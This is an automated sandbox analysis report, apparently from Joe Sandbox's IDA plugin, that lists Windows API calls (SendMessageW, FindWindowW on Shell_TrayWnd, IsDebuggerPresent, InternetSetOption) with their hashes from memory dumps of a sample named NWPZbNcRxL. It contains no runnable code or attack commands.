                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Internet$OpenOption
                                                                                                                            • String ID: <local>
                                                                                                                            • API String ID: 942729171-4266983199
                                                                                                                            • Opcode ID: 7dc911409ca9aa70a2e321b104d791f17a2cb6939a28938bc0dc9382be60f861
                                                                                                                            • Instruction ID: e9b7d0f03d659e1b36fc0344ec38b2122036829aba3587c321cbbccd56930565
                                                                                                                            • Opcode Fuzzy Hash: 7dc911409ca9aa70a2e321b104d791f17a2cb6939a28938bc0dc9382be60f861
                                                                                                                            • Instruction Fuzzy Hash: FA11C670541225BADB25AF51CCCCFBBFBA8FF16769F10822AF51586000D2705955D7F4
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00C17DE1: _memmove.LIBCMT ref: 00C17E22
                                                                                                                              • Part of subcall function 00C6AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00C6AABC
                                                                                                                            • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00C68E73
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ClassMessageNameSend_memmove
                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                            • API String ID: 372448540-1403004172
                                                                                                                            • Opcode ID: a310a2c288e098834ad31ae38b67a3c0b58bc0567b2167e0d219fe2d3f1ac1cf
                                                                                                                            • Instruction ID: 3a2f88e5ee563e8f5f3287355f33d87c7a99400b11e9fff0bf4ea1215b9c0a63
                                                                                                                            • Opcode Fuzzy Hash: a310a2c288e098834ad31ae38b67a3c0b58bc0567b2167e0d219fe2d3f1ac1cf
                                                                                                                            • Instruction Fuzzy Hash: BA0128B5601218ABCB24FBA0CC85DFE7368EF02320B400719F831672D2DE32580CEA50
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00C17DE1: _memmove.LIBCMT ref: 00C17E22
                                                                                                                              • Part of subcall function 00C6AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00C6AABC
                                                                                                                            • SendMessageW.USER32(?,00000180,00000000,?), ref: 00C68D6B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ClassMessageNameSend_memmove
                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                            • API String ID: 372448540-1403004172
                                                                                                                            • Opcode ID: 8736880f1cbdcafa90ac5776b4c6f3816c5af5ec086217a91ae957518d5d1291
                                                                                                                            • Instruction ID: d1c3cac79861d66e432649a892b0b4b4c2be268dd89ce792563775f9393bb427
                                                                                                                            • Opcode Fuzzy Hash: 8736880f1cbdcafa90ac5776b4c6f3816c5af5ec086217a91ae957518d5d1291
                                                                                                                            • Instruction Fuzzy Hash: B101D471A41109ABCF24EBE0C996EFE73A8DF16300F10012AB911772D2DE119E0CFA71
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00C17DE1: _memmove.LIBCMT ref: 00C17E22
                                                                                                                              • Part of subcall function 00C6AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00C6AABC
                                                                                                                            • SendMessageW.USER32(?,00000182,?,00000000), ref: 00C68DEE
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ClassMessageNameSend_memmove
                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                            • API String ID: 372448540-1403004172
                                                                                                                            • Opcode ID: 2e03ceb41bf7dfdb765c466e9375b6d3d86c676fdd6dd3821847b00d9551dc6a
                                                                                                                            • Instruction ID: 964ef9d91e145ee42f12d5a299d549964472eb75aac6a34c4351422e0bfd8173
                                                                                                                            • Opcode Fuzzy Hash: 2e03ceb41bf7dfdb765c466e9375b6d3d86c676fdd6dd3821847b00d9551dc6a
                                                                                                                            • Instruction Fuzzy Hash: 6C01A771A41109ABDB21E6A4C986EFE77ACDF12300F10011AB915732D2DE114E0DF671
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00C399AC: __getptd_noexit.LIBCMT ref: 00C399AD
                                                                                                                            • __lock.LIBCMT ref: 00C39443
                                                                                                                            • _free.LIBCMT ref: 00C39470
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __getptd_noexit__lock_free
                                                                                                                            • String ID: `
                                                                                                                            • API String ID: 1533244847-4168407445
                                                                                                                            • Opcode ID: 5b24396f4963062a7cd30b9f2e0300e2fbad735bd3b8218bc48c2ed065d7bbef
                                                                                                                            • Instruction ID: 572a749d9044832684bc0bd4c6096fd5f7c596be5a534c171ff02a83941e8907
                                                                                                                            • Opcode Fuzzy Hash: 5b24396f4963062a7cd30b9f2e0300e2fbad735bd3b8218bc48c2ed065d7bbef
                                                                                                                            • Instruction Fuzzy Hash: CB118432D217269BCB21AF6D940175DB3A0FB45B20F15411AF8B4A7280CBB45E43DFC6
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ClassName_wcscmp
                                                                                                                            • String ID: #32770
                                                                                                                            • API String ID: 2292705959-463685578
                                                                                                                            • Opcode ID: 5695fa1a3abf6d2e28225e9d80593614dcfb4aa6c03b8491fa6cebf2fdbb634a
                                                                                                                            • Instruction ID: 93f9b53694ebe5274f6e40ba3adca7a87036a1670cdcbdad79170bb05823a235
                                                                                                                            • Opcode Fuzzy Hash: 5695fa1a3abf6d2e28225e9d80593614dcfb4aa6c03b8491fa6cebf2fdbb634a
                                                                                                                            • Instruction Fuzzy Hash: 5AE0D8326002282BE7209B99EC49FABF7ACEB45B70F00006BFD04D3051EA609B55C7E1
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00C4B314: _memset.LIBCMT ref: 00C4B321
                                                                                                                              • Part of subcall function 00C30940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00C4B2F0,?,?,?,00C1100A), ref: 00C30945
                                                                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,00C1100A), ref: 00C4B2F4
                                                                                                                            • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00C1100A), ref: 00C4B303
                                                                                                                            Strings
                                                                                                                            • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00C4B2FE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                                                                                            • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                            • API String ID: 3158253471-631824599
                                                                                                                            • Opcode ID: b5b9d1d61d847d2f34d238644ebf3f8632afa69fee6da16ca72ae14a6a3e1fd8
                                                                                                                            • Instruction ID: 866f2ba4c054e58de5f2c0504afd9582c560e53f466e8bb933da12d04d87a10d
                                                                                                                            • Opcode Fuzzy Hash: b5b9d1d61d847d2f34d238644ebf3f8632afa69fee6da16ca72ae14a6a3e1fd8
                                                                                                                            • Instruction Fuzzy Hash: 17E012B02007518FD720DF2AD50878A7BE4BF04755F11897DE496C7661EBF4D845CBA1
                                                                                                                            APIs
                                                                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00C959AE
                                                                                                                            • PostMessageW.USER32(00000000), ref: 00C959B5
                                                                                                                              • Part of subcall function 00C75244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C752BC
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FindMessagePostSleepWindow
                                                                                                                            • String ID: Shell_TrayWnd
                                                                                                                            • API String ID: 529655941-2988720461
                                                                                                                            • Opcode ID: 6b65fcacab57586cf225035fdec61505175f23f40fcf2d16057b7ead80f61c95
                                                                                                                            • Instruction ID: db4f6b5dedf980ed91e5d5cfb0d7543bafb16027f6badaa253d2075a58198b2a
                                                                                                                            • Opcode Fuzzy Hash: 6b65fcacab57586cf225035fdec61505175f23f40fcf2d16057b7ead80f61c95
                                                                                                                            • Instruction Fuzzy Hash: 6DD0C9317843117BE664AB709C0FF9B6614AB04B50F01083AB25AEA1D1C9E0A801C654
                                                                                                                            APIs
                                                                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00C9596E
                                                                                                                            • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00C95981
                                                                                                                              • Part of subcall function 00C75244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C752BC
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FindMessagePostSleepWindow
                                                                                                                            • String ID: Shell_TrayWnd
                                                                                                                            • API String ID: 529655941-2988720461
                                                                                                                            • Opcode ID: 162e213cb0cb084e539feab8cf79eecf43b7d08987e5c8ee55115e5ad8a2601e
                                                                                                                            • Instruction ID: e8a5461aeff9dff259e766cf6a35c8adc37d9ffea9df459187bd9fbaf40035f6
                                                                                                                            • Opcode Fuzzy Hash: 162e213cb0cb084e539feab8cf79eecf43b7d08987e5c8ee55115e5ad8a2601e
                                                                                                                            • Instruction Fuzzy Hash: C1D01231784311B7E664BB70DC0FFDB6A14BF00B50F01083EB35AEA1D1C9E09801C654